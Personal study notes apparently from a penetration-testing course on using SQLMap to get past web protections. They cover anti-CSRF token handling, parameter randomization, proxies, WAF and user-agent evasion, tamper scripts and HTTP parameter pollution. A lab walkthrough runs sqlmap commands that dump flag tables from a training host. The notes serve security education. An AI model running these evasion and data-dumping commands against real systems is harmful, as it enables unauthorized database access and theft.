8 - Bypassing Web App Protections

# Anti-CRSF Token Bypass - One of the first lines of defense against the usage of automation tools is the incorporation of anti-CSRF tokens into all HTTP requests, especially those generated as a result of web-form filling - In most basic terms, each HTTP request in such a scenario should have a (valid) token value available only if the user actually visited and used the page - While the original idea was the prevention of scenarios with malicious links, this security feature also hardened against automation - SQLMap has options that can help in bypassing anti-CSRF protection. Namely, the most important option is `--csrf-token` - By specifying the token parameter name (which should already be available within the provided request data), SQLMap will automatically attempt to parse the target response content and search for fresh token values so it can use them in the next request ```bash sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" ``` # Unique Value Bypass - In some cases, the web application may only require unique values to be provided inside predefined parameters - Such a mechanism is similar to the anti-CSRF technique described above, except that there is no need to parse the web page content - For this, the option `--randomize` within SQLMap should be used, pointing to the parameter name containing a value which should be randomized before being sent ```bash sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI ``` # Calculated Parameter Bypass - Another similar mechanism is where a web application expects a proper parameter value to be calculated based on some other parameter value(s) - Most often, one parameter value has to contain the message digest (e.g., `h=MD5(id)`) of another one - To bypass this, the option `--eval` should be used, where a valid Python code is being evaluated just before the request is being sent to the target ```bash sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI ``` # IP Address Concealing - In case we want to conceal our IP address, or if a certain web application has a protection mechanism that blacklists our current IP address, we can try to use a proxy - A proxy can be set with the option `--proxy` (e.g. `--proxy="socks4://177.39.187.70:33283"`), where we should add a working proxy - In addition to that, if we have a list of proxies, we can provide them to SQLMap with the option `--proxy-file` - This way, SQLMap will go sequentially through the list, and in case of any problems (e.g., blacklisting of IP address), it will just skip from current to the next from the list # WAF Bypass - Whenever we run SQLMap, As part of the initial tests, SQLMap sends a predefined malicious looking payload using a non-existent parameter name (e.g., `?pfov=...`) to test for the existence of a WAF - There will be a substantial change in the response compared to the original in case of any protection between the user and the target - For example, if one of the most popular WAF solutions (ModSecurity) is implemented, there should be a `406 - Not Acceptable` response after such a request - In case of a positive detection, to identify the actual protection mechanism, SQLMap uses a third-party library [identYwaf](https://github.com/stamparm/identYwaf), containing the signatures of 80 different WAF solutions - If we wanted to skip this heuristical test altogether (i.e., to produce less noise), we can use switch `--skip-waf` # User-agent Blacklisting Bypass - In case of immediate problems (e.g., HTTP error code 5XX from the start) while running SQLMap, one of the first things we should think of is the potential blacklisting of the default user-agent used by SQLMap (e.g. `User-agent: sqlmap/1.4.9 (http://sqlmap.org)`) - This is trivial to bypass with the switch `--random-agent`, which changes the default user-agent with a randomly chosen value from a large pool of values used by browsers # Tamper Scripts - One of the most popular mechanisms implemented in SQLMap for bypassing WAF/IPS solutions is the so-called "tamper" scripts - Tamper scripts are a special kind of (Python) scripts written for modifying requests just before being sent to the target, in most cases to bypass some protection - Tamper scripts can be chained, one after another, within the `--tamper` option (e.g. `--tamper=between,randomcase`), where they are run based on their predefined priority - To get a whole list of implemented tamper scripts, along with the description as above, switch `--list-tampers` can be used |**Tamper-Script**|**Description**| |---|---| |`0eunion`|Replaces instances of UNION with e0UNION| |`base64encode`|Base64-encodes all characters in a given payload| |`between`|Replaces greater than operator (`>`) with `NOT BETWEEN 0 AND #` and equals operator (`=`) with `BETWEEN # AND #`| |`commalesslimit`|Replaces (MySQL) instances like `LIMIT M, N` with `LIMIT N OFFSET M` counterpart| |`equaltolike`|Replaces all occurrences of operator equal (`=`) with `LIKE` counterpart| |`halfversionedmorekeywords`|Adds (MySQL) versioned comment before each keyword| |`modsecurityversioned`|Embraces complete query with (MySQL) versioned comment| |`modsecurityzeroversioned`|Embraces complete query with (MySQL) zero-versioned comment| |`percentage`|Adds a percentage sign (`%`) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)| |`plus2concat`|Replaces plus operator (`+`) with (MsSQL) function CONCAT() counterpart| |`randomcase`|Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)| |`space2comment`|Replaces space character ( ) with comments `/| |`space2dash`|Replaces space character ( ) with a dash comment (`--`) followed by a random string and a new line (`\n`)| |`space2hash`|Replaces (MySQL) instances of space character ( ) with a pound character (`#`) followed by a random string and a new line (`\n`)| |`space2mssqlblank`|Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters| |`space2plus`|Replaces space character ( ) with plus (`+`)| |`space2randomblank`|Replaces space character ( ) with a random blank character from a valid set of alternate characters| |`symboliclogical`|Replaces AND and OR logical operators with their symbolic counterparts (`&&` and `\|`)| |`versionedkeywords`|Encloses each non-function keyword with (MySQL) versioned comment| |`versionedmorekeywords`|Encloses each keyword with (MySQL) versioned comment| # Misc Bypasses - Out of other protection bypass mechanisms, there are also two more that should be mentioned ## Chunking - The first one is the `Chunked` transfer encoding, turned on using the switch `--chunked`, which splits the POST request's body into so-called "chunks" - Blacklisted SQL keywords are split between chunks in a way that the request containing them can pass unnoticed ## HTTP Parameter Pollution - The other bypass mechanisms is the `HTTP parameter pollution` (`HPP`), where payloads are split in a similar way as in case of `--chunked` between different same parameter named values (e.g. `?id=1&id=UNION&id=SELECT&id=username,password&id=FROM&id=users...`), which are concatenated by the target platform if supporting it (e.g. `ASP`) # Exercise ## Case 8 - Detect and exploit SQLi vulnerability in POST parameter id, while taking care of the anti-CSRF protection - There's a PHPSESSID cookie and an anti-CRSF token ![[images/Pasted image 20251209193726.png]] - Specify non-standard token name - Getting somewhere ```bash sqlmap -u "http://94.237.121.111:40941/case8.php" --data="id=1&t0ken=oVk30ug0Rxbpb7klNljoHZnocV38BROvOg44FwXBNs" --csrf-token="t0ken" ``` ![[images/Pasted image 20251209194820.png]] - Now additionally specify table_name to dump ```bash sqlmap -u "http://94.237.121.111:40941/case8.php" --data="id=1&t0ken=oVk30ug0Rxbpb7klNljoHZnocV38BROvOg44FwXBNs" --csrf-token="t0ken" -T flag8 --dump ``` ![[images/Pasted image 20251209194853.png]] # Case 9 - Detect and exploit SQLi vulnerability in GET parameter id, while taking care of the unique uid ![[images/Pasted image 20251209195212.png]] - Attempt 1: uid = anti-csrf token - Failure ```bash sqlmap -u "http://94.237.121.111:40941/case9.php" --data="id=1&uid=3394455602" --csrf-token="uid" -T flag9 --dump ``` ![[images/Pasted image 20251209195615.png]] - Attempt 2: include cookie - Still a failure ```bash sqlmap -u "http://94.237.121.111:40941/case9.php" --data="id=1&uid=3394455602" --csrf-token="uid" -T flag9 --dump cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' ``` ![[images/Pasted image 20251209195819.png]] - Attempt 3: use hint to randomize uid - Failure ```bash sqlmap -u "http://94.237.121.111:40941/case9.php" --data="id=1&uid=3394455602" --randomize=uid -T flag9 --dump cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' ``` ![[images/Pasted image 20251209200202.png]] - Attempt 4: remove `--data` - Success! ```bash sqlmap -u "http://94.237.121.111:40941/case9.php?id=1&uid=3394455602" --randomize=uid -T flag9 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' ``` ![[images/Pasted image 20251209200338.png]] # Case 10 - Detect and exploit SQLi vulnerability in POST parameter id ![[images/Pasted image 20251209200533.png]] - Attempt 1: specify cookie and POST method - Failure ```bash sqlmap -u "http://94.237.121.111:40941/case10.php?" --data="id=1" -T flag10 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --method POST ``` ![[images/Pasted image 20251209200908.png]] - Attempt 2: Intercept sqlmap requests with Burp based on hint - Use `--data` for id because id is in the body not in the URL itself ```bash sqlmap -u "http://94.237.121.111:40941/case10.php?" --data="id=1" -T flag10 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --method POST --proxy=http://127.0.0.1:8080 ``` - View of one of the requests from sqlmap ![[images/Pasted image 20251209201452.png]] - Attempt 3: Use `--random-agent` based on hint - Success! ```bash sqlmap -u "http://94.237.121.111:40941/case10.php?" --data="id=1" -T flag10 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --method P OST --random-agent ``` ![[images/Pasted image 20251209201727.png]] ## Case 11 - Detect and exploit SQLi vulnerability in GET parameter id - Filtering of characters '<', '>'![[images/Pasted image 20251209202259.png]] - Attempt 1: try `between` tamper script to handle less than and greater than filtering ```bash sqlmap -u "http://94.237.121.111:40941/case11.php?id=1" -T flag11 --dump --cookie='PHPSESSID=i64begvr5hsj52i456jl3h9rc2' --tamper=between ``` ![[images/Pasted image 20251209202510.png]]